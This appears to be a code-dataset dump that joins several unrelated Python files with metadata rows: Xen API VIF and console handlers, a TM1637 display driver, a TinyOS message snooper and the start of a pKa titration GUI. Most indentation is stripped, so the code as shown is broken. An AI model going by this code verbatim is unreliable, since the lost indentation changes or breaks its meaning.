if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VIF_create(session, vif_struct)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VIF_create', vif_struct)
else:
return self._VIF_create(session, vif_struct)
def _VIF_create(self, session, vif_struct):
xendom = XendDomain.instance()
mac = vif_struct.get('MAC')
vm_ref = vif_struct.get('VM')
if not xendom.is_valid_vm(vm_ref):
return xen_api_error(['VM_NOT_FOUND', 'VM', vif_struct.get('VM')])
vifs = self._VM_get_VIFs(session, vm_ref).get('Value')
if vifs:
if cmp(len(vifs), INTERFACE_LIMIT) >= 0:
return xen_api_error(['DEVICE_OUT_OF_RANGE', 'VIF'])
if not self._VIF_is_mac_format_legal(mac):
return xen_api_error(['MAC_INVALID'])
dom = xendom.get_vm_by_uuid(vif_struct.get('VM'))
try:
vif_ref = dom.create_vif(vif_struct)
xendom.managed_config_save(dom)
return xen_api_success(vif_ref)
except XendError, exn:
return xen_api_error(['INTERNAL_ERROR', str(exn)])
def _VIF_is_mac_format_legal(self, mac):
mac_re = re.compile("00:16:3e:[0-9a-f][0-9a-f]:[0-9a-f][0-9a-f]:[0-9a-f][0-9a-f]")
if not mac:
return True
if mac and cmp(mac_re.match(mac), None) != 0:
return True
return False
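    # For example, an empty MAC and '00:16:3e:ab:cd:ef' (the Xen OUI matched
    # by mac_re above) are accepted, while any other prefix is rejected.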
def VIF_destroy(self, session, vif_ref):
xendom = XendDomain.instance()
vm = xendom.get_vm_with_dev_uuid('vif', vif_ref)
if not vm:
return xen_api_error(['HANDLE_INVALID', 'VIF', vif_ref])
vm.destroy_vif(vif_ref)
xendom.managed_config_save(vm)
return xen_api_success_void()
def _VIF_get(self, ref, prop):
return xen_api_success(
XendDomain.instance().get_dev_property_by_uuid('vif', ref, prop))
# getters/setters
def VIF_get_metrics(self, _, vif_ref):
return xen_api_success(vif_ref)
def VIF_get_VM(self, session, vif_ref):
xendom = XendDomain.instance()
vm = xendom.get_vm_with_dev_uuid('vif', vif_ref)
return xen_api_success(vm.get_uuid())
def VIF_get_MTU(self, session, vif_ref):
return self._VIF_get(vif_ref, 'MTU')
def VIF_get_MAC(self, session, vif_ref):
return self._VIF_get(vif_ref, 'MAC')
def VIF_get_device(self, session, vif_ref):
return self._VIF_get(vif_ref, 'device')
def VIF_get_network(self, session, vif_ref):
return self._VIF_get(vif_ref, 'network')
def VIF_get_all(self, session):
xendom = XendDomain.instance()
vifs = [d.get_vifs() for d in XendDomain.instance().list('all')]
        vifs = reduce(lambda x, y: x + y, vifs, [])
return xen_api_success(vifs)
def VIF_get_runtime_properties(self, _, vif_ref):
xendom = XendDomain.instance()
dominfo = xendom.get_vm_with_dev_uuid('vif', vif_ref)
device = dominfo.get_dev_config_by_uuid('vif', vif_ref)
try:
devid = int(device['id'])
device_sxps = dominfo.getDeviceSxprs('vif')
device_dicts = [dict(device_sxp[1][1:])
for device_sxp in device_sxps]
device_dict = [device_dict
for device_dict in device_dicts
if int(device_dict['handle']) == devid][0]
return xen_api_success(device_dict)
except Exception, exn:
log.exception(exn)
return xen_api_success({})
def VIF_get_security_label(self, session, vif_ref):
return self._VIF_get(vif_ref, 'security_label')
def _VIF_set(self, ref, prop, val, old_val):
return XendDomain.instance().set_dev_property_by_uuid(
'vif', ref, prop, val, old_val)
def VIF_set_security_label(self, session, vif_ref, sec_lab, old_lab):
xendom = XendDomain.instance()
dom = xendom.get_vm_with_dev_uuid('vif', vif_ref)
if not dom:
return xen_api_error(['HANDLE_INVALID', 'VIF', vif_ref])
if dom._stateGet() == XEN_API_VM_POWER_STATE_RUNNING:
raise SecurityError(-xsconstants.XSERR_RESOURCE_IN_USE)
rc = self._VIF_set(vif_ref, 'security_label', sec_lab, old_lab)
if rc == False:
raise SecurityError(-xsconstants.XSERR_BAD_LABEL)
return xen_api_success(xsconstants.XSERR_SUCCESS)
# Xen API: Class VIF_metrics
# ----------------------------------------------------------------
VIF_metrics_attr_ro = ['io_read_kbs',
'io_write_kbs',
'io_total_read_kbs',
'io_total_write_kbs',
'last_updated']
VIF_metrics_attr_rw = []
VIF_metrics_methods = []
def VIF_metrics_get_all(self, session):
return self.VIF_get_all(session)
def VIF_metrics_get_record(self, _, ref):
vm = XendDomain.instance().get_vm_with_dev_uuid('vif', ref)
if not vm:
return xen_api_error(['HANDLE_INVALID', 'VIF_metrics', ref])
return xen_api_success(
{ 'io_read_kbs' : vm.get_dev_property('vif', ref, 'io_read_kbs'),
'io_write_kbs' : vm.get_dev_property('vif', ref, 'io_write_kbs'),
'io_total_read_kbs' : vm.get_dev_property('vif', ref, 'io_total_read_kbs'),
'io_total_write_kbs' : vm.get_dev_property('vif', ref, 'io_total_write_kbs'),
'last_updated' : now()
})
def VIF_metrics_get_io_read_kbs(self, _, ref):
return self._VIF_get(ref, 'io_read_kbs')
def VIF_metrics_get_io_write_kbs(self, session, ref):
return self._VIF_get(ref, 'io_write_kbs')
def VIF_metrics_get_io_total_read_kbs(self, _, ref):
return self._VIF_get(ref, 'io_total_read_kbs')
def VIF_metrics_get_io_total_write_kbs(self, session, ref):
return self._VIF_get(ref, 'io_total_write_kbs')
def VIF_metrics_get_last_updated(self, _1, _2):
return xen_api_success(now())
# Xen API: Class console
# ----------------------------------------------------------------
console_attr_ro = ['location', 'protocol', 'VM']
console_attr_rw = ['other_config']
console_methods = [('destroy', None)]
console_funcs = [('create', 'console'),
('create_on', 'console')]
def console_get_all(self, session):
xendom = XendDomain.instance()
# cons = list(BNPoolAPI._consoles_to_VM.keys())
cons = [d.get_consoles() for d in XendDomain.instance().list('all')]
        cons = reduce(lambda x, y: x + y, cons, [])
return xen_api_success(cons)
def console_get_location(self, session, console_ref):
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_console(console_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._console_get_location(console_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, "console_get_location", console_ref)
else:
return self._console_get_location(console_ref)
def _console_get_location(self, console_ref):
xendom = XendDomain.instance()
return xen_api_success(xendom.get_dev_property_by_uuid('console',
console_ref,
'location'))
def console_get_protocol(self, session, console_ref):
xendom = XendDomain.instance()
return xen_api_success(xendom.get_dev_property_by_uuid('console',
console_ref,
'protocol'))
def console_get_VM(self, session, console_ref):
xendom = XendDomain.instance()
vm = xendom.get_vm_with_dev_uuid('console', console_ref)
return xen_api_success(vm.get_uuid())
def console_get_other_config(self, session, console_ref):
xendom = XendDomain.instance()
return xen_api_success(xendom.get_dev_property_by_uuid('console',
console_ref,
'other_config'))
# object methods
def _console_get_record(self, session, console_ref):
xendom = XendDomain.instance()
vm = xendom.get_vm_with_dev_uuid('console', console_ref)
if not vm:
return xen_api_error(['HANDLE_INVALID', 'console', console_ref])
cfg = vm.get_dev_xenapi_config('console', console_ref)
log.debug(cfg)
if not cfg:
return xen_api_error(['HANDLE_INVALID', 'console', console_ref])
valid_console_keys = self.console_attr_ro + self.console_attr_rw + \
self.Base_attr_ro + self.Base_attr_rw
return_cfg = {}
for k in cfg.keys():
if k in valid_console_keys:
return_cfg[k] = cfg[k]
return xen_api_success(return_cfg)
def console_get_record(self, session, console_ref):
if BNPoolAPI._isMaster:
# try:
host_ref = BNPoolAPI.get_host_by_console(console_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._console_get_record(session, console_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'console_get_record', console_ref)
# proxy = ServerProxy('http://' + remote_ip + ':9363')
# response = proxy.session.login('root')
# if cmp(response['Status'], 'Failure') == 0:
# return xen_api_error(response['ErrorDescription'])
# session_ref = response['Value']
# return proxy.console.get_record(session_ref, console_ref)
# except KeyError:
# return xen_api_error(['key error', console_ref])
# except socket.error:
# return xen_api_error(['socket error', console_ref])
else:
return self._console_get_record(session, console_ref)
def console_create_on(self, session, console_struct, host_ref):
if BNPoolAPI._isMaster:
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self.console_create(session, console_struct)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
response = xen_rpc_call(remote_ip, 'console_create', console_struct)
if cmp (response.get('Status'), 'Success') == 0:
BNPoolAPI.update_data_struct("console_create", response.get('Value'), console_struct.get('VM'))
return response
else:
return self.console_create(session, console_struct)
def console_create(self, session, console_struct):
vm_ref = console_struct['VM']
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._console_create(session, console_struct)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'console_create', console_struct)
else:
return self._console_create(session, console_struct)
def _console_create(self, session, console_struct):
xendom = XendDomain.instance()
if not xendom.is_valid_vm(console_struct['VM']):
return xen_api_error(['HANDLE_INVALID', 'VM',
console_struct['VM']])
dom = xendom.get_vm_by_uuid(console_struct['VM'])
try:
if 'protocol' not in console_struct:
return xen_api_error(['CONSOLE_PROTOCOL_INVALID',
'No protocol specified'])
console_ref = dom.create_console(console_struct)
xendom.managed_config_save(dom)
BNPoolAPI.update_data_struct("console_create", console_ref, dom.get_uuid())
return xen_api_success(console_ref)
except XendError, exn:
return xen_api_error(['INTERNAL_ERROR', str(exn)])
def console_destroy(self, session, console_ref):
xendom = XendDomain.instance()
vm = xendom.get_vm_with_dev_uuid('console', console_ref)
if not vm:
return xen_api_error(['HANDLE_INVALID', 'Console', console_ref])
vm.destroy_console(console_ref)
xendom.managed_config_save(vm)
return xen_api_success_void()
def console_set_other_config(self, session, console_ref, other_config):
xd = XendDomain.instance()
vm = xd.get_vm_with_dev_uuid('console', console_ref)
vm.set_console_other_config(console_ref, other_config)
xd.managed_config_save(vm)
return xen_api_success_void()
class BNVMAPIAsyncProxy:
""" A redirector for Async.Class.function calls to XendAPI
but wraps the call for use with the XendTaskManager.
@ivar xenapi: Xen API instance
@ivar method_map: Mapping from XMLRPC method name to callable objects.
"""
method_prefix = 'Async.'
def __init__(self, xenapi):
"""Initialises the Async Proxy by making a map of all
implemented Xen API methods for use with XendTaskManager.
@param xenapi: XendAPI instance
"""
self.xenapi = xenapi
self.method_map = {}
for method_name in dir(self.xenapi):
method = getattr(self.xenapi, method_name)
            if method_name[0] != '_' and getattr(method, 'async', False):
self.method_map[method.api] = method
def _dispatch(self, method, args):
"""Overridden method so that SimpleXMLRPCServer will
resolve methods through this method rather than through
inspection.
@param method: marshalled method name from XMLRPC.
@param args: marshalled arguments from XMLRPC.
"""
# Only deal with method names that start with "Async."
if not method.startswith(self.method_prefix):
return xen_api_error(['MESSAGE_METHOD_UNKNOWN', method])
# Lookup synchronous version of the method
synchronous_method_name = method[len(self.method_prefix):]
if synchronous_method_name not in self.method_map:
return xen_api_error(['MESSAGE_METHOD_UNKNOWN', method])
method = self.method_map[synchronous_method_name]
# Check that we've got enough arguments before issuing a task ID.
needed = argcounts[method.api]
if len(args) != needed:
return xen_api_error(['MESSAGE_PARAMETER_COUNT_MISMATCH',
self.method_prefix + method.api, needed,
len(args)])
# Validate the session before proceeding
session = args[0]
if not auth_manager().is_session_valid(session):
return xen_api_error(['SESSION_INVALID', session])
# create and execute the task, and return task_uuid
return_type = getattr(method, 'return_type', '<none/>')
task_uuid = XendTaskManager.create_task(method, args,
synchronous_method_name,
return_type,
synchronous_method_name,
session)
return xen_api_success(task_uuid)
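    # A hypothetical client-side sketch (the port and login call mirror the
    # commented-out proxy code earlier in this file; the method name is only
    # an illustration of the "Async." prefix convention):
    #
    #   proxy = ServerProxy('http://' + remote_ip + ':9363')
    #   session_ref = proxy.session.login('root')['Value']
    #   task_uuid = proxy.Async.VM_start(session_ref, vm_ref)['Value']
    #   # ...then poll the task manager with task_uuid until it completes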
def instance():
"""Singleton constructror. Use this method instead of the class constructor.
"""
global inst
try:
inst
    except NameError:
inst = BNVMAPI(None)
return inst
|
mit
| -6,386,652,897,247,954,000
| 40.294742
| 164
| 0.508084
| false
| 3.707909
| true
| false
| false
|
KyleKing/PiAlarm
|
.archive-python/modules/tm1637.py
|
1
|
6795
|
"""Manipulate a TM1637 7-segment display."""
import math
import threading
from time import localtime, sleep
from . import config as cg
from .context import IO
IO.setwarnings(False)
IO.setmode(IO.BCM)
HexDigits = [0x3f, 0x06, 0x5b, 0x4f, 0x66, 0x6d, 0x7d,
0x07, 0x7f, 0x6f, 0x77, 0x7c, 0x39, 0x5e, 0x79, 0x71]
ADDR_AUTO = 0x40
ADDR_FIXED = 0x44
STARTADDR = 0xC0
class TM1637(object):
"""TM1637 7-Segment Display."""
def __init__(self, clk, dio, brightness=1.0):
"""Initializer."""
self.CLK = clk
self.DIO = dio
self.brightness = brightness
self.double_point = False
self.current_values = [0, 0, 0, 0]
IO.setup(self.CLK, IO.OUT)
IO.setup(self.DIO, IO.OUT)
def cleanup(self):
"""Stop updating clock, turn off display, and cleanup GPIO."""
self.stop_clock()
self.clear()
IO.cleanup()
def clear(self):
"""Clear display."""
b = self.brightness
point = self.double_point
self.brightness = 0
self.double_point = False
data = [0x7F, 0x7F, 0x7F, 0x7F]
self.show(data)
# Restore previous settings:
self.brightness = b
self.double_point = point
def show(self, data):
"""Show data on display."""
for i in range(0, 4):
self.current_values[i] = data[i]
self.start()
self.write_byte(ADDR_AUTO)
self.br()
self.write_byte(STARTADDR)
for i in range(0, 4):
self.write_byte(self.coding(data[i]))
self.br()
self.write_byte(0x88 + int(self.brightness))
self.stop()
def set_digit(self, idx, data):
"""Set 7-segment digit by index [0, 3]."""
assert not (idx < 0 or idx > 3), 'Index must be in (0,3). Args: ({},{})'.format(idx, data)
self.current_values[idx] = data
self.start()
self.write_byte(ADDR_FIXED)
self.br()
self.write_byte(STARTADDR | idx)
self.write_byte(self.coding(data))
self.br()
self.write_byte(0x88 + int(self.brightness))
self.stop()
def set_brightness(self, percent):
"""Set brightness in range 0-1."""
max_brightness = 7.0
brightness = math.ceil(max_brightness * percent)
if (brightness < 0):
brightness = 0
if (self.brightness != brightness):
self.brightness = brightness
self.show(self.current_values)
def show_colon(self, on):
"""Show or hide double point divider."""
if (self.double_point != on):
self.double_point = on
self.show(self.current_values)
def write_byte(self, data):
"""Write byte to display."""
for i in range(0, 8):
IO.output(self.CLK, IO.LOW)
if (data & 0x01):
IO.output(self.DIO, IO.HIGH)
else:
IO.output(self.DIO, IO.LOW)
data = data >> 1
IO.output(self.CLK, IO.HIGH)
# Wait for ACK
IO.output(self.CLK, IO.LOW)
IO.output(self.DIO, IO.HIGH)
IO.output(self.CLK, IO.HIGH)
IO.setup(self.DIO, IO.IN)
while IO.input(self.DIO):
sleep(0.001)
if (IO.input(self.DIO)):
IO.setup(self.DIO, IO.OUT)
IO.output(self.DIO, IO.LOW)
IO.setup(self.DIO, IO.IN)
IO.setup(self.DIO, IO.OUT)
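    # Protocol note: bytes are shifted out LSB-first -- DIO is set while CLK
    # is low and latched by the chip on the rising edge -- and the trailing
    # clock cycle samples DIO (switched to input) to wait for the chip's ACK.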
def start(self):
"""Send start signal to TM1637."""
IO.output(self.CLK, IO.HIGH)
IO.output(self.DIO, IO.HIGH)
IO.output(self.DIO, IO.LOW)
IO.output(self.CLK, IO.LOW)
def stop(self):
"""Stop clock."""
IO.output(self.CLK, IO.LOW)
IO.output(self.DIO, IO.LOW)
IO.output(self.CLK, IO.HIGH)
IO.output(self.DIO, IO.HIGH)
def br(self):
"""Terse break."""
self.stop()
self.start()
def coding(self, data):
"""Set coding of display."""
point_data = 0x80 if self.double_point else 0
return 0 if data == 0x7F else HexDigits[data] + point_data
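    # Worked example (values follow from HexDigits and clear() above):
    #   coding(4)    -> HexDigits[4] = 0x66, the segment pattern for "4"
    #   coding(4) with double_point set -> 0x66 + 0x80 = 0xe6 (point bit lit)
    #   coding(0x7F) -> 0, a blank digit (this is what clear() sends)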
def clock(self, military_time):
"""Clock thread script."""
# Based on: https://github.com/johnlr/raspberrypi-tm1637
self.show_colon(True)
while (not self.__stop_event.is_set()):
t = localtime()
hour = t.tm_hour
if not military_time:
hour = 12 if (t.tm_hour % 12) == 0 else t.tm_hour % 12
d0 = hour // 10 if hour // 10 else 0
d1 = hour % 10
d2 = t.tm_min // 10
d3 = t.tm_min % 10
digits = [d0, d1, d2, d3]
self.show(digits)
# # Optional visual feedback of running alarm:
# print digits
# for i in tqdm(range(60 - t.tm_sec)):
for i in range(60 - t.tm_sec):
if (not self.__stop_event.is_set()):
sleep(1)
def start_clock(self, military_time=True):
"""Start clock thread."""
# Stop event based on: http://stackoverflow.com/a/6524542/3219667
self.__stop_event = threading.Event()
self.__clock_thread = threading.Thread(target=self.clock, args=(military_time,))
self.__clock_thread.daemon = True # stops w/ main thread
self.__clock_thread.start()
def stop_clock(self):
"""Stop clock thread."""
try:
print('Attempting to stop live clock')
self.__stop_event.set()
self.clear()
except AttributeError:
print('No clock to close')
if __name__ == '__main__':
"""Confirm the display operation"""
# Initialize the clock (GND, VCC=3.3V, Example Pins are DIO=20 and CLK=21)
clock = cg.get_pin('7Segment', 'clk')
digital = cg.get_pin('7Segment', 'dio')
    display = TM1637(clk=clock, dio=digital, brightness=1.0)
print('clock', clock)
print('digital', digital)
display.clear()
digits = [1, 2, 3, 4]
display.show(digits)
input('1234 - Working? (Press Key)')
print('Updating one digit at a time:')
display.clear()
display.set_digit(1, 3)
sleep(0.5)
display.set_digit(2, 2)
sleep(0.5)
display.set_digit(3, 1)
sleep(0.5)
display.set_digit(0, 4)
input('4321 - (Press Key)')
print('Add double point\n')
display.show_colon(True)
sleep(0.2)
print('Brightness Off')
display.set_brightness(0)
sleep(0.5)
print('Full Brightness')
display.set_brightness(1)
sleep(0.5)
print('30% Brightness')
display.set_brightness(0.3)
sleep(0.3)
input('Start the clock?')
display.start_clock(military_time=True)
input('Stop the clock?')
display.stop_clock()
|
mit
| -4,063,615,821,204,735,500
| 28.16309
| 98
| 0.547903
| false
| 3.347291
| false
| false
| false
|
fresskarma/tinyos-1.x
|
tools/python/pytos/util/MessageSnooper.py
|
1
|
4759
|
#!/usr/bin/python
#$Id: MessageSnooper.py,v 1.2 2005/10/27 02:23:37 kaminw Exp $
# "Copyright (c) 2000-2003 The Regents of the University of California.
# All rights reserved.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose, without fee, and without written agreement
# is hereby granted, provided that the above copyright notice, the following
# two paragraphs and the author appear in all copies of this software.
#
# IN NO EVENT SHALL THE UNIVERSITY OF CALIFORNIA BE LIABLE TO ANY PARTY FOR
# DIRECT, INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES ARISING OUT
# OF THE USE OF THIS SOFTWARE AND ITS DOCUMENTATION, EVEN IF THE UNIVERSITY
# OF CALIFORNIA HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# THE UNIVERSITY OF CALIFORNIA SPECIFICALLY DISCLAIMS ANY WARRANTIES,
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY
# AND FITNESS FOR A PARTICULAR PURPOSE. THE SOFTWARE PROVIDED HEREUNDER IS
# ON AN "AS IS" BASIS, AND THE UNIVERSITY OF CALIFORNIA HAS NO OBLIGATION TO
# PROVIDE MAINTENANCE, SUPPORT, UPDATES, ENHANCEMENTS, OR MODIFICATIONS."
#
# @author Kamin Whitehouse
#
import sys
import pytos.Comm as Comm
import pytos.tools.Drain as Drain
import pytos.tools.Drip as Drip
import threading
def registerAllMsgs(msgs, msgQueue, connection) :
for msgName in msgs._msgNames :
msg = msgs[msgName]
connection.register( msg , msgQueue )
class MessageSnooper( object ) :
"""This module offers \"register\" and \"unregister\" functions that
take a messageHandler argument but no message type argument.
Instead, the messageHandler will receive ALL incoming messages. It
currently handles local receive, drain messages, rpc messages, and
ramSymbol messages. Any new routing protocols should be
incorporated into this module.
usage:
snooper = MessageSnooper(app)
    snooper.start()
    snooper.stop()
snooper.register(callbackFcn)
snooper.unregister(callbackFcn)
"""
def __init__( self , app="" ) :
self.app = app
self.listeners = []
msgQueue = Comm.MessageQueue(10)
#register the msgQueue for all message types with localComm
comm = Comm.getCommObject(self.app, self.app.motecom)
registerAllMsgs(self.app.msgs, msgQueue, comm)
#register the msgQueue for all message types with drain and unregister DrainMsg with localComm
if "AM_DRAINMSG" in self.app.enums._enums :
drains = Drain.getDrainObject(self.app)
for drain in drains:
registerAllMsgs(self.app.msgs, msgQueue, drain)
comm.unregister(self.app.msgs.DrainMsg, msgQueue)
#if rpc is imported
if self.app.__dict__.has_key("rpc") :
#make sure a drip object exists for snooping on cmds
drips = Drip.getDripObject(self.app, self.app.motecom, self.app.enums.AM_RPCCOMMANDMSG)
#register the msgQueue for all rpc response messages
for command in self.app.rpc._messages.values() :
command.register(msgQueue)
#and unregister RpcResponseMsg from drain
drains = Drain.getDrainObject(self.app, self.app.motecom, 0xfffe) #ugh... hard coded number
for drain in drains:
drain.unregister(app.msgs.RpcResponseMsg, msgQueue)
#if ram symbols is imported
if self.app.__dict__.has_key("ramSymbols") :
#register the msgQueue for all ram symbol response messages
for symbol in self.app.ramSymbols._messages.values() :
symbol.registerPeek(msgQueue)
symbol.registerPoke(msgQueue)
#and unregister from peek/poke rpc commands
self.app.RamSymbolsM.peek.unregister(msgQueue)
self.app.RamSymbolsM.poke.unregister(msgQueue)
#register the msgQueue for all message types with drip and unregister DripMsg with localComm
if "AM_DRIPMSG" in self.app.enums._enums :
drips = Drip.getDripObject(self.app)
for drip in drips:
print "actually dtrying to register dripmsgs\n"
registerAllMsgs(self.app.msgs, msgQueue, drip)
comm.unregister(self.app.msgs.DripMsg, msgQueue)
self.running = True
msgThread = threading.Thread(target=self.processMessages,
args=(msgQueue,))
msgThread.setDaemon(True)
msgThread.start()
def processMessages(self, msgQueue) :
while True :
(addr,msg) = msgQueue.get()
if self.running == True :
for listener in self.listeners :
listener.messageReceived(addr, msg)
def stop(self) :
self.running = False
def start(self) :
self.running = True
def register(self, msgHandler) :
self.listeners.append(msgHandler)
def unregister(self, msgHandler) :
self.listeners.remove(msgHandler)
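#
# A minimal sketch of a compatible message handler (the class name is
# hypothetical): processMessages calls messageReceived(addr, msg) on every
# registered listener, so any object providing that method will work.
#
#   class PrintHandler :
#       def messageReceived(self, addr, msg) :
#           print addr, msg
#
#   snooper = MessageSnooper(app)
#   snooper.register(PrintHandler())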
|
bsd-3-clause
| 8,937,040,000,648,870,000
| 37.691057
| 98
| 0.709603
| false
| 3.616261
| false
| false
| false
|
dmnfarrell/peat
|
pKaTool/pKa_system.py
|
1
|
55804
|
#!/usr/bin/env python
# -*- coding: iso-8859-15 -*-
#
# pKaTool - analysis of systems of titratable groups
# Copyright (C) 2010 Jens Erik Nielsen
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Contact information:
# Email: Jens.Nielsen_at_gmail.com
# Normal mail:
# Jens Nielsen
# SBBS, Conway Institute
# University College Dublin
# Dublin 4, Ireland
import sys
from Tkinter import *
import tkFileDialog
import pKa_base, pKa_system_help, pKa_calc, pKa_system_micro, pKa_system_file_menu, CCPS_stab_opt
import pKa_system_data_manipulation
import group_control
import ftir_data
__pKaSystemVersion__=1.2
#
# Geometry helper functions
#
def get_y_fromstab(val,span):
"""Get the y coordinate for plotting the stability curve"""
zero=10
graphrange=180
if span==0:
span=10
return (graphrange-val*(graphrange/span))+zero
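    # For example, with span=90: val=0 maps to y=190 (the baseline) and
    # val=90 maps to y=10 (the top of the 180-pixel graph area).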
#
# --------
#
class pKa_system(Frame,pKa_base.pKa_base,pKa_system_help.system_help,
pKa_system_help.pKsensitivity,
pKa_system_help.decompose,
pKa_system_micro.Micro_states,
pKa_system_file_menu.file_menu,
pKa_system_file_menu.fit_menu,
pKa_system_data_manipulation.data_manipulation,
CCPS_stab_opt.Optimisation_Analysis):
def __init__(self,numgroups=None,parent_application=None,data=None,protein=None,field_name=None,update=True):
#
# Set up the main window
#
# The main window provides choice between the different modes
# for now: pKa Calculations, pKa System
#
self.ID='pKa_system'
self.font="Times 12 bold"
self.fg_colour='white'
self.bg_colour='black'
self.colour_order=['#646464','#4444ff','red','green','magenta','yellow','orange','grey','magenta']
self.linewidth=2
self.names={}
self.lastdir=None
self.parent_application=parent_application
self.init_not_done=1
self.ID='pKa_system'
self.protein=protein
self.field_name=field_name
#
# Stability window parameters
#
self.stab_window=None
self.U_control=None
self.old_stab_status=''
self.exp_stab_curve=False
#
# Set the pKa calculation parameters
#
self.pHstart=0.00001
self.pHend=20.0
self.maxcrg=1.0
self.mincrg=-1.0
#
# pKa method
#
self.pkamethods={'Boltzmann':pKa_calc.Boltzmann,
'Monte Carlo':pKa_calc.Monte_Carlo,
'Tanford-Roxby':pKa_calc.Tanford_Roxby,
'Monte Carlo (C++)':pKa_calc.Monte_Carlo_CPP,
'Boltzmann (C++)':pKa_calc.Boltzmann_CPP}
#
# Check if we are called from EnzSim
#
self.enzsim=False
if protein=='__enzsim_application__':
self.enzsim=True
#
# Set data
#
self.data={'numgroups':numgroups}
#
# All lines drawn
#
self.lines={}
self.state_lines={}
self.stab_lines={}
self.to_clear=[]
self.stab_test_on=None
#
# Do the window
#
self.do_window()
if update:
self.update_pkasystem_curves()
self.window.update_idletasks()
#
# convert data
#
if data:
if data.has_key('groups'):
self.unpack_all_data(data)
else:
self.convert_titration_data(data)
return
#
# ------
#
def do_window(self):
#
# Main window
#
if not self.parent_application:
Frame.__init__(self)
self.window=self.master
else:
self.window=Toplevel()
#
# Title
#
#self.window.geometry('+280+380')
self.window.title("pKa System - Play with titratable groups")
#
# Get the size of the screen
#
#
        # Text box at top
#
label1=Label(self.window, text="Enter number of titratable groups",font=self.font)
label1.grid(row=0,column=0, sticky=W)
#
# Entry field
#
self.number_of_groups=IntVar()
self.numgrps_widget=Entry(self.window,textvariable=self.number_of_groups)
#
# If we have a number then insert it
#
if self.data['numgroups']:
self.number_of_groups.set(self.data['numgroups'])
self.numgrps=self.data['numgroups']
self.window.destroy()
else:
def destroy(event=None):
self.numgrps=int(self.number_of_groups.get())
self.window.destroy()
return
self.number_of_groups.set(3)
self.numgrps_widget.grid(row=0,column=1,sticky=W)
self.numgrps_widget.bind('<Return>',destroy)
self.window.wait_window(self.window)
#
# Done
#
self.getgrps()
return
#
# --------------
#
def getgrps(self,event=None):
#
# Get the number of groups
#
import string
#
# Open the window for the titration curves
#
if not self.parent_application:
Frame.__init__(self)
self.window=self.master
screen_width=self.winfo_screenwidth()
screen_height=self.winfo_screenheight()
else:
self.window=Toplevel()
screen_width=self.parent_application.winfo_screenwidth()
screen_height=self.parent_application.winfo_screenheight()
#
self.titwin=self.window
self.titwin.title('Titration curves [native]')
#self.titwin.geometry('+20+%d' %(95+self.numgrps*43))
#
# Draw the window with the titration curves
#
self.titwidth=1200
self.titheight=450
self.tc=Canvas(self.titwin,bd=5,bg='white',width=self.titwidth,
height=self.titheight,
scrollregion=(0,0,self.titwidth,self.titheight))
self.tc.xview("moveto", 0)
self.tc.yview("moveto", 0)
self.tc.grid(row=0,column=0)
#
# Axes
#
self.draw_ordinates(self.tc)
#
# Open window with the controls
#
self.startrow=3
self.groups={}
self.win=Toplevel()
#
# Create the main pulldown menu
#
self.menu=Menu(self.win)
#
# File menu
#
self.file_menu=Menu(self.menu,tearoff=0)
self.file_menu.add_command(label='Load system',command=self.load_system)
self.file_menu.add_command(label='Save system',command=self.save_system)
if self.parent_application:
if getattr(self.parent_application,'ID',None):
if self.parent_application.ID=='EAT':
self.file_menu.add_command(label='Save system in EAT & Exit',command=self.send_system_to_EAT)
elif self.parent_application.ID=='Ekin':
self.file_menu.add_command(label='Save system in EAT',command=self.send_system_to_EAT)
self.file_menu.add_command(label='Load titration curves',command=self.load_curves)
self.file_menu.add_command(label='Save titration curves',command=self.save_curves)
self.file_menu.add_command(label='Load titration_DB data',command=self.load_titdb)
self.file_menu.add_command(label='Load pH activity profile',command=self.load_pH_activity_profile)
self.file_menu.add_command(label='Load pH stability profile',command=self.load_pH_stability_profile)
self.file_menu.add_command(label='Load FTIR data',command=self.load_FTIR_data)
self.file_menu.add_command(label='Print population table',command=self.print_table)
self.file_menu.add_command(label='Add group',command=self.add_group)
self.file_menu.add_command(label='Remove exp. titration curve',command=self.remove_exp_curve)
self.file_menu.add_command(label='Exit',command=self.quit_application)
self.menu.add_cascade(label='File',menu=self.file_menu)
#
# Command menu
#
self.command_menu=Menu(self.menu,tearoff=0)
self.command_menu.add_command(label='Decompose system',command=self.decompose_system)
self.command_menu.add_command(label='Sensitivity analysis',command=self.sensitivity_test)
self.command_menu.add_command(label='Change dielectric constant',command=self.change_dielectric)
self.command_menu.add_command(label='Activate updating',command=self.activate_callbacks)
self.command_menu.add_command(label='Deactivate updating',command=self.deactivate_callbacks)
self.command_menu.add_separator()
self.command_menu.add_command(label='Copy group to EAT_DB Ekin',command=self.copy_to_Ekin)
self.menu.add_cascade(label='Command',menu=self.command_menu)
#
# Fitting menu
#
self.fit_menu=Menu(self.menu,tearoff=0)
self.fit_menu.add_command(label='Fit system to loaded curves',command=self.fit_system_to_curves)
self.fit_menu.add_command(label='Fit to pH-activity profile',command=self.fit_to_ph_activity_profile)
